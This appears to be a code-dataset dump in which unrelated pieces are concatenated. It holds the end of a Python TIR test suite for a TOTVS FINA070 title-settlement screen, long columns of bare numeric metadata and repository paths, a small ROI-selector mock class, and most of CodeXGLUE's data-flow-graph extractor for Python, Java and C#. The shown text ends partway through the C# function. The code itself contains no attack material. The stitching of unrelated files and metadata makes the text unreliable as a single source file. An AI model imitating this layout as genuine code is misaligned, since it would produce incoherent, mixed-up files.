    # One Salvar per title in the batch.
    self.oHelper.CheckResult("nValRec", "9.385,00", name_attr=True)
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckResult("nValRec", "4.385,00", name_attr=True)
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.AssertTrue()
### CT302
### TIR - Batch settlement with multi-nature apportionment and motive validation.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT302(self):
    """Batch-settle a title: first with an invalid settlement motive
    ("COMP CARTE" -> FA070MOTIN help), then with NORMAL plus the
    multi-nature apportionment flow, ending in the TOTGERAL dialog.
    """
    prefixo = "FIN"
    titulo = "FIN070MTN"
    parcela = " "
    tipo = "NF "
    banco = "FIN"
    agencia = "FIN70"
    conta = "FIN70405"
    data = "28/12/2020"
    lote = 'RR415'
    ntitulos = '1'
    natureza = '001'
    #self.oHelper.AddParameter("MV_MULNATR", "", ".T.", ".T.", ".T.")
    #self.oHelper.SetParameters()
    self.oHelper.WaitShow("Baixa de Titulos")
    self.oHelper.SetKey("F12")
    self.oHelper.SetValue("Contabiliza On Line ?" ,"Sim")
    self.oHelper.SetValue("Considera Retencäo Bancaria ?" ,"Nao")
    self.oHelper.SetButton('Ok')
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Outras Ações", "Lote")
    self.oHelper.SetValue("cBancolt", banco, name_attr=True)
    self.oHelper.SetValue("cAgencialt", agencia, name_attr=True)
    self.oHelper.SetValue("cContalt", conta, name_attr=True)
    self.oHelper.SetValue("nNroTit", ntitulos, name_attr=True)
    self.oHelper.SetValue("cLoteFin", lote, name_attr=True)
    self.oHelper.SetValue("cNaturLote", natureza, name_attr=True)
    self.oHelper.SetValue("dVencDe", data, name_attr=True)
    self.oHelper.SetValue("dVencAte", data, name_attr=True)
    self.oHelper.SetValue("cNatDe", natureza, name_attr=True)
    self.oHelper.SetValue("cNatAte", natureza, name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Salvar")
    #self.oHelper.ClickBox("Filial", select_all=True)
    self.oHelper.ClickBox("Filial", select_all=False, grid_number=1)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckResult("nValRec", "3.000,00", name_attr=True)
    self.oHelper.SetValue("cMotBx", "COMP CARTE", name_attr=True)
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckHelp(text='FA070MOTIN',button='Fechar')  # invalid motive for batch settlement
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetValue("", True)  # multi-nature apportionment checkbox
    self.oHelper.SetButton("Salvar")
    self.oHelper.SetValue("Natureza", "001", grid=True, row=1)
    self.oHelper.SetValue("Vlr.Movim.", "3000,00", grid=True, row=1)
    self.oHelper.SetValue("Rat. C.Custo", "1 - Sim", grid=True, row=1)
    self.oHelper.LoadGrid()
    self.oHelper.SetButton("Outras Ações", "Rateio")
    self.oHelper.SetValue("cCodRateio", "001", name_attr=True)
    self.oHelper.SetButton("Ok")
    self.oHelper.SetButton("Salvar")
    self.oHelper.SetButton("Salvar")
    self.oHelper.CheckHelp(text='TOTGERAL',button='Fechar')
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.AssertTrue()
### CT303
### TIR - Cheque grid editing and discount validation on the settlement screen.
### TestCase: https://jiraproducao.totvs.com.br/secure/Tests.jspa#/project/10231/testCase?folderId=2595
def test_FINA070_CT303(self):
    """Edit and delete rows in the cheque grid, then verify that an
    over-large discount (10.000,00) is rejected/corrected to 10,00,
    yielding 4.990,00 received. Nothing is saved (final Cancelar).
    """
    prefixo = "FIN"
    titulo = "FIN070CHQ"
    parcela = " "
    tipo = "NF "
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.SetButton("Baixar")
    self.oHelper.CheckResult("nValRec", "5.000,00", name_attr=True)
    self.oHelper.SetValue("cMotBx", "NORMAL", name_attr=True)
    self.oHelper.SetButton("Outras Ações", "Cheque(s)")
    self.oHelper.SetValue("Valor ref. baixa", "2000,00", grid=True, row=1)
    self.oHelper.LoadGrid()
    # Delete the remaining cheque rows one at a time.
    self.oHelper.SetKey("DELETE", grid=True, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.SetKey("DELETE", grid=True, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.SetKey("DELETE", grid=True, grid_number=1)
    self.oHelper.LoadGrid()
    self.oHelper.SetButton("Salvar")
    self.oHelper.SetValue("- Descontos", "10.000,00")
    self.oHelper.SetValue("- Descontos", "10,00")
    self.oHelper.SetButton("Ok")
    self.oHelper.CheckResult("nValRec", "4.990,00", name_attr=True)
    self.oHelper.SetButton("Cancelar")
    self.oHelper.SearchBrowse(f"D MG 01 {prefixo}{titulo}{parcela}{tipo}")
    self.oHelper.AssertTrue()
@classmethod
def tearDownClass(cls):
    """Release the shared TIR helper (closes the automated browser/session)
    once after all tests in the class have run.
    """
    # PEP 8: the first parameter of a classmethod is conventionally `cls`
    # (was `inst`); the rename does not affect callers.
    cls.oHelper.TearDown()
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    unittest.main()
| 34.202048
| 104
| 0.69624
| 4,701
| 36,733
| 5.398851
| 0.092534
| 0.244011
| 0.137746
| 0.054846
| 0.85725
| 0.823404
| 0.782033
| 0.752561
| 0.721671
| 0.699251
| 0
| 0.053274
| 0.127705
| 36,733
| 1,074
| 105
| 34.202048
| 0.738812
| 0.140201
| 0
| 0.699329
| 0
| 0
| 0.245637
| 0.03289
| 0
| 0
| 0
| 0
| 0.032215
| 1
| 0.034899
| false
| 0
| 0.005369
| 0
| 0.041611
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f232d933cad56e4cb53662da8a1ae7d8d616450
| 225
|
py
|
Python
|
radiomicsfeatureextractionpipeline/backend/test/mock_ups/logic/roi_selector/manual_roi_selector.py
|
Maastro-CDS-Imaging-Group/SQLite4Radiomics
|
e3a7afc181eec0fe04c18da00edc3772064e6758
|
[
"Apache-2.0"
] | null | null | null |
radiomicsfeatureextractionpipeline/backend/test/mock_ups/logic/roi_selector/manual_roi_selector.py
|
Maastro-CDS-Imaging-Group/SQLite4Radiomics
|
e3a7afc181eec0fe04c18da00edc3772064e6758
|
[
"Apache-2.0"
] | 6
|
2021-06-09T19:39:27.000Z
|
2021-09-30T16:41:40.000Z
|
radiomicsfeatureextractionpipeline/backend/test/mock_ups/logic/roi_selector/manual_roi_selector.py
|
Maastro-CDS-Imaging-Group/SQLite4Radiomics
|
e3a7afc181eec0fe04c18da00edc3772064e6758
|
[
"Apache-2.0"
] | null | null | null |
from logic.roi_selector.manual_roi_selector import ManualROISelector
from test.mock_ups.logic.roi_selector.roi_selector import ROISelectorMockUp
class ManualROISelectorMockUp(ManualROISelector, ROISelectorMockUp):
    """Test double combining ManualROISelector with the ROISelectorMockUp mixin.

    Adds no behavior of its own; everything is inherited from the two bases
    (MRO resolves ManualROISelector first).
    """
    pass
| 32.142857
| 75
| 0.875556
| 25
| 225
| 7.64
| 0.56
| 0.230366
| 0.167539
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 225
| 6
| 76
| 37.5
| 0.922705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
9f7d0e540574b334c2e040710055ace42c7511a7
| 61,951
|
py
|
Python
|
Code-Code/code-to-code-trans/evaluator/CodeBLEU/parser/DFG.py
|
snsnlou/CodeXGLUE
|
80ff689671574e5aac0a5560b530ac0fd9c08ca4
|
[
"CC0-1.0",
"MIT"
] | null | null | null |
Code-Code/code-to-code-trans/evaluator/CodeBLEU/parser/DFG.py
|
snsnlou/CodeXGLUE
|
80ff689671574e5aac0a5560b530ac0fd9c08ca4
|
[
"CC0-1.0",
"MIT"
] | null | null | null |
Code-Code/code-to-code-trans/evaluator/CodeBLEU/parser/DFG.py
|
snsnlou/CodeXGLUE
|
80ff689671574e5aac0a5560b530ac0fd9c08ca4
|
[
"CC0-1.0",
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from tree_sitter import Language, Parser
from .utils import (remove_comments_and_docstrings,
tree_to_token_index,
index_to_code_token,
tree_to_variable_index)
def DFG_python(root_node,index_to_code,states):
    """Extract data-flow edges from a Python tree-sitter parse tree.

    Recursively walks ``root_node`` and returns edges of the form
    ``(token, token_idx, relation, [src_tokens], [src_idxs])`` where
    ``relation`` is ``'comesFrom'`` or ``'computedFrom'``.

    Args:
        root_node: tree-sitter node to process.
        index_to_code: maps a token node's ``(start_point, end_point)`` to
            ``(token_index, token_text)``.
        states: maps a variable name to the list of token indexes that may
            define it; copied on entry so the caller's dict is not mutated.

    Returns:
        ``(edges, states)`` — edges sorted by token index, plus the updated
        variable-definition map.
    """
    # Node-type groups selecting the handling branch below.
    assignment=['assignment','augmented_assignment','for_in_clause']
    if_statement=['if_statement']
    for_statement=['for_statement']
    while_statement=['while_statement']
    do_first_statement=['for_in_clause']
    def_statement=['default_parameter']
    states=states.copy()
    # Leaf token (string literals are treated as single tokens; comments skipped).
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Keyword / punctuation token: carries no data flow.
            return [],states
        elif code in states:
            # Known variable: this use comes from its recorded definitions.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                # First sighting: the identifier defines itself.
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # Default parameter: the name flows from its default value (if any).
    elif root_node.type in def_statement:
        name=root_node.child_by_field_name('name')
        value=root_node.child_by_field_name('value')
        DFG=[]
        if value is None:
            indexs=tree_to_variable_index(name,index_to_code)
            for index in indexs:
                idx,code=index_to_code[index]
                DFG.append((code,idx,'comesFrom',[],[]))
                states[code]=[idx]
            return sorted(DFG,key=lambda x:x[1]),states
        else:
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            temp,states=DFG_python(value,index_to_code,states)
            DFG+=temp
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                states[code1]=[idx1]
            return sorted(DFG,key=lambda x:x[1]),states
    # Assignment (incl. augmented and for-in targets): LHS computed from RHS.
    elif root_node.type in assignment:
        if root_node.type=='for_in_clause':
            right_nodes=[root_node.children[-1]]
            left_nodes=[root_node.child_by_field_name('left')]
        else:
            if root_node.child_by_field_name('right') is None:
                return [],states
            left_nodes=[x for x in root_node.child_by_field_name('left').children if x.type!=',']
            right_nodes=[x for x in root_node.child_by_field_name('right').children if x.type!=',']
            # Fall back to whole-node pairing when tuple arities differ or a
            # side has no sub-tokens.
            if len(right_nodes)!=len(left_nodes):
                left_nodes=[root_node.child_by_field_name('left')]
                right_nodes=[root_node.child_by_field_name('right')]
            if len(left_nodes)==0:
                left_nodes=[root_node.child_by_field_name('left')]
            if len(right_nodes)==0:
                right_nodes=[root_node.child_by_field_name('right')]
        DFG=[]
        for node in right_nodes:
            temp,states=DFG_python(node,index_to_code,states)
            DFG+=temp
        for left_node,right_node in zip(left_nodes,right_nodes):
            left_tokens_index=tree_to_variable_index(left_node,index_to_code)
            right_tokens_index=tree_to_variable_index(right_node,index_to_code)
            temp=[]
            for token1_index in left_tokens_index:
                idx1,code1=index_to_code[token1_index]
                temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
                             [index_to_code[x][0] for x in right_tokens_index]))
                states[code1]=[idx1]
            DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
    # if/elif/else: each branch is evaluated against a copy, then merged.
    elif root_node.type in if_statement:
        DFG=[]
        current_states=states.copy()
        others_states=[]
        tag=False
        if 'else' in root_node.type:
            tag=True
        for child in root_node.children:
            if 'else' in child.type:
                tag=True
            if child.type not in ['elif_clause','else_clause']:
                temp,current_states=DFG_python(child,index_to_code,current_states)
                DFG+=temp
            else:
                temp,new_states=DFG_python(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        # No else branch means the whole construct may be skipped, so the
        # incoming states survive as one possible outcome.
        if tag is False:
            others_states.append(states)
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in new_states:
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # for loop: two passes so edges from the second pass capture loop-carried
    # flow; duplicates merged afterwards.
    elif root_node.type in for_statement:
        DFG=[]
        for i in range(2):
            right_nodes=[x for x in root_node.child_by_field_name('right').children if x.type!=',']
            left_nodes=[x for x in root_node.child_by_field_name('left').children if x.type!=',']
            if len(right_nodes)!=len(left_nodes):
                left_nodes=[root_node.child_by_field_name('left')]
                right_nodes=[root_node.child_by_field_name('right')]
            if len(left_nodes)==0:
                left_nodes=[root_node.child_by_field_name('left')]
            if len(right_nodes)==0:
                right_nodes=[root_node.child_by_field_name('right')]
            for node in right_nodes:
                temp,states=DFG_python(node,index_to_code,states)
                DFG+=temp
            for left_node,right_node in zip(left_nodes,right_nodes):
                left_tokens_index=tree_to_variable_index(left_node,index_to_code)
                right_tokens_index=tree_to_variable_index(right_node,index_to_code)
                temp=[]
                for token1_index in left_tokens_index:
                    idx1,code1=index_to_code[token1_index]
                    temp.append((code1,idx1,'computedFrom',[index_to_code[x][1] for x in right_tokens_index],
                                 [index_to_code[x][0] for x in right_tokens_index]))
                    states[code1]=[idx1]
                DFG+=temp
            if root_node.children[-1].type=="block":
                temp,states=DFG_python(root_node.children[-1],index_to_code,states)
                DFG+=temp
        # Merge duplicate (token, idx, relation) edges from the two passes.
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # while loop: two passes over all children, then de-duplicate edges.
    elif root_node.type in while_statement:
        DFG=[]
        for i in range(2):
            for child in root_node.children:
                temp,states=DFG_python(child,index_to_code,states)
                DFG+=temp
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    else:
        # Generic node: recurse into children, do_first_statement nodes first
        # (for_in_clause binds its target before the comprehension body).
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_python(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_python(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
def DFG_java(root_node,index_to_code,states):
    """Extract data-flow edges from a Java tree-sitter parse tree.

    Same contract as DFG_python: returns ``(edges, states)`` where each edge
    is ``(token, token_idx, relation, [src_tokens], [src_idxs])`` and
    ``states`` maps variable names to their possible defining token indexes.
    ``states`` is copied on entry so the caller's dict is not mutated.
    """
    # Node-type groups selecting the handling branch below.
    assignment=['assignment_expression']
    def_statement=['variable_declarator']
    increment_statement=['update_expression']
    if_statement=['if_statement','else']
    for_statement=['for_statement']
    enhanced_for_statement=['enhanced_for_statement']
    while_statement=['while_statement']
    do_first_statement=[]
    states=states.copy()
    # Leaf token (string literals treated as single tokens; comments skipped).
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Keyword / punctuation token: no data flow.
            return [],states
        elif code in states:
            # Known variable: link this use to its recorded definitions.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # Variable declarator: name flows from its initializer (if any).
    elif root_node.type in def_statement:
        name=root_node.child_by_field_name('name')
        value=root_node.child_by_field_name('value')
        DFG=[]
        if value is None:
            indexs=tree_to_variable_index(name,index_to_code)
            for index in indexs:
                idx,code=index_to_code[index]
                DFG.append((code,idx,'comesFrom',[],[]))
                states[code]=[idx]
            return sorted(DFG,key=lambda x:x[1]),states
        else:
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            temp,states=DFG_java(value,index_to_code,states)
            DFG+=temp
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                states[code1]=[idx1]
            return sorted(DFG,key=lambda x:x[1]),states
    # Assignment: every LHS token computed from every RHS token.
    elif root_node.type in assignment:
        left_nodes=root_node.child_by_field_name('left')
        right_nodes=root_node.child_by_field_name('right')
        DFG=[]
        temp,states=DFG_java(right_nodes,index_to_code,states)
        DFG+=temp
        name_indexs=tree_to_variable_index(left_nodes,index_to_code)
        value_indexs=tree_to_variable_index(right_nodes,index_to_code)
        for index1 in name_indexs:
            idx1,code1=index_to_code[index1]
            for index2 in value_indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # ++/-- update expression: the variable is computed from itself.
    elif root_node.type in increment_statement:
        DFG=[]
        indexs=tree_to_variable_index(root_node,index_to_code)
        for index1 in indexs:
            idx1,code1=index_to_code[index1]
            for index2 in indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # if/else chain: condition+then run on a copy; else branches start from
    # the incoming states; all outcomes are merged at the end.
    elif root_node.type in if_statement:
        DFG=[]
        current_states=states.copy()
        others_states=[]
        flag=False
        tag=False
        if 'else' in root_node.type:
            tag=True
        for child in root_node.children:
            if 'else' in child.type:
                tag=True
            if child.type not in if_statement and flag is False:
                temp,current_states=DFG_java(child,index_to_code,current_states)
                DFG+=temp
            else:
                # flag latches once a nested if/else child is reached.
                flag=True
                temp,new_states=DFG_java(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        # Without an else branch the incoming states survive as an outcome.
        if tag is False:
            others_states.append(states)
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in new_states:
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # for loop: one full pass, then a second pass from the init declaration
    # onward to capture loop-carried flow; duplicates merged.
    elif root_node.type in for_statement:
        DFG=[]
        for child in root_node.children:
            temp,states=DFG_java(child,index_to_code,states)
            DFG+=temp
        flag=False
        for child in root_node.children:
            if flag:
                temp,states=DFG_java(child,index_to_code,states)
                DFG+=temp
            elif child.type=="local_variable_declaration":
                flag=True
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # Enhanced for (for-each): name computed from the iterated value; two
    # passes over value/name/body, then de-duplicate.
    elif root_node.type in enhanced_for_statement:
        name=root_node.child_by_field_name('name')
        value=root_node.child_by_field_name('value')
        body=root_node.child_by_field_name('body')
        DFG=[]
        for i in range(2):
            temp,states=DFG_java(value,index_to_code,states)
            DFG+=temp
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
            temp,states=DFG_java(body,index_to_code,states)
            DFG+=temp
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # while loop: two passes over all children, then de-duplicate edges.
    elif root_node.type in while_statement:
        DFG=[]
        for i in range(2):
            for child in root_node.children:
                temp,states=DFG_java(child,index_to_code,states)
                DFG+=temp
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    else:
        # Generic node: recurse into children (do_first_statement is empty
        # for Java, so only the second loop runs).
        DFG=[]
        for child in root_node.children:
            if child.type in do_first_statement:
                temp,states=DFG_java(child,index_to_code,states)
                DFG+=temp
        for child in root_node.children:
            if child.type not in do_first_statement:
                temp,states=DFG_java(child,index_to_code,states)
                DFG+=temp
        return sorted(DFG,key=lambda x:x[1]),states
def DFG_csharp(root_node,index_to_code,states):
    """Extract data-flow edges from a C# tree-sitter parse tree.

    Same contract as DFG_python/DFG_java: returns ``(edges, states)`` where
    each edge is ``(token, token_idx, relation, [src_tokens], [src_idxs])``
    and ``states`` maps variable names to their possible defining token
    indexes. ``states`` is copied on entry; the caller's dict is untouched.
    """
    # Node-type groups selecting the handling branch below.
    assignment=['assignment_expression']
    def_statement=['variable_declarator']
    increment_statement=['postfix_unary_expression']
    if_statement=['if_statement','else']
    for_statement=['for_statement']
    enhanced_for_statement=['for_each_statement']
    while_statement=['while_statement']
    do_first_statement=[]
    states=states.copy()
    # Leaf token (string literals treated as single tokens; comments skipped).
    if (len(root_node.children)==0 or root_node.type in ['string_literal','string','character_literal']) and root_node.type!='comment':
        idx,code=index_to_code[(root_node.start_point,root_node.end_point)]
        if root_node.type==code:
            # Keyword / punctuation token: no data flow.
            return [],states
        elif code in states:
            # Known variable: link this use to its recorded definitions.
            return [(code,idx,'comesFrom',[code],states[code].copy())],states
        else:
            if root_node.type=='identifier':
                states[code]=[idx]
            return [(code,idx,'comesFrom',[],[])],states
    # Variable declarator: the C# grammar exposes name/value positionally
    # (two children = name + initializer, one child = bare name).
    elif root_node.type in def_statement:
        if len(root_node.children)==2:
            name=root_node.children[0]
            value=root_node.children[1]
        else:
            name=root_node.children[0]
            value=None
        DFG=[]
        if value is None:
            indexs=tree_to_variable_index(name,index_to_code)
            for index in indexs:
                idx,code=index_to_code[index]
                DFG.append((code,idx,'comesFrom',[],[]))
                states[code]=[idx]
            return sorted(DFG,key=lambda x:x[1]),states
        else:
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            temp,states=DFG_csharp(value,index_to_code,states)
            DFG+=temp
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'comesFrom',[code2],[idx2]))
                states[code1]=[idx1]
            return sorted(DFG,key=lambda x:x[1]),states
    # Assignment: every LHS token computed from every RHS token.
    elif root_node.type in assignment:
        left_nodes=root_node.child_by_field_name('left')
        right_nodes=root_node.child_by_field_name('right')
        DFG=[]
        temp,states=DFG_csharp(right_nodes,index_to_code,states)
        DFG+=temp
        name_indexs=tree_to_variable_index(left_nodes,index_to_code)
        value_indexs=tree_to_variable_index(right_nodes,index_to_code)
        for index1 in name_indexs:
            idx1,code1=index_to_code[index1]
            for index2 in value_indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # Postfix ++/--: the variable is computed from itself.
    elif root_node.type in increment_statement:
        DFG=[]
        indexs=tree_to_variable_index(root_node,index_to_code)
        for index1 in indexs:
            idx1,code1=index_to_code[index1]
            for index2 in indexs:
                idx2,code2=index_to_code[index2]
                DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
        return sorted(DFG,key=lambda x:x[1]),states
    # if/else chain: condition+then on a copy; else branches from incoming
    # states; all possible outcomes merged at the end.
    elif root_node.type in if_statement:
        DFG=[]
        current_states=states.copy()
        others_states=[]
        flag=False
        tag=False
        if 'else' in root_node.type:
            tag=True
        for child in root_node.children:
            if 'else' in child.type:
                tag=True
            if child.type not in if_statement and flag is False:
                temp,current_states=DFG_csharp(child,index_to_code,current_states)
                DFG+=temp
            else:
                # flag latches once a nested if/else child is reached.
                flag=True
                temp,new_states=DFG_csharp(child,index_to_code,states)
                DFG+=temp
                others_states.append(new_states)
        others_states.append(current_states)
        # Without an else branch the incoming states survive as an outcome.
        if tag is False:
            others_states.append(states)
        new_states={}
        for dic in others_states:
            for key in dic:
                if key not in new_states:
                    new_states[key]=dic[key].copy()
                else:
                    new_states[key]+=dic[key]
        for key in new_states:
            new_states[key]=sorted(list(set(new_states[key])))
        return sorted(DFG,key=lambda x:x[1]),new_states
    # for loop: one full pass, then a second pass from the init declaration
    # onward to capture loop-carried flow; duplicates merged.
    elif root_node.type in for_statement:
        DFG=[]
        for child in root_node.children:
            temp,states=DFG_csharp(child,index_to_code,states)
            DFG+=temp
        flag=False
        for child in root_node.children:
            if flag:
                temp,states=DFG_csharp(child,index_to_code,states)
                DFG+=temp
            elif child.type=="local_variable_declaration":
                flag=True
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
        DFG=[(x[0],x[1],x[2],y[0],y[1]) for x,y in sorted(dic.items(),key=lambda t:t[0][1])]
        return sorted(DFG,key=lambda x:x[1]),states
    # foreach: loop variable ('left') computed from the iterated 'right';
    # two passes over value/name/body, then de-duplicate.
    elif root_node.type in enhanced_for_statement:
        name=root_node.child_by_field_name('left')
        value=root_node.child_by_field_name('right')
        body=root_node.child_by_field_name('body')
        DFG=[]
        for i in range(2):
            temp,states=DFG_csharp(value,index_to_code,states)
            DFG+=temp
            name_indexs=tree_to_variable_index(name,index_to_code)
            value_indexs=tree_to_variable_index(value,index_to_code)
            for index1 in name_indexs:
                idx1,code1=index_to_code[index1]
                for index2 in value_indexs:
                    idx2,code2=index_to_code[index2]
                    DFG.append((code1,idx1,'computedFrom',[code2],[idx2]))
                states[code1]=[idx1]
            temp,states=DFG_csharp(body,index_to_code,states)
            DFG+=temp
        dic={}
        for x in DFG:
            if (x[0],x[1],x[2]) not in dic:
                dic[(x[0],x[1],x[2])]=[x[3],x[4]]
            else:
                dic[(x[0],x[1],x[2])][0]=list(set(dic[(x[0],x[1],x[2])][0]+x[3]))
                dic[(x[0],x[1],x[2])][1]=sorted(list(set(dic[(x[0],x[1],x[2])][1]+x[4])))
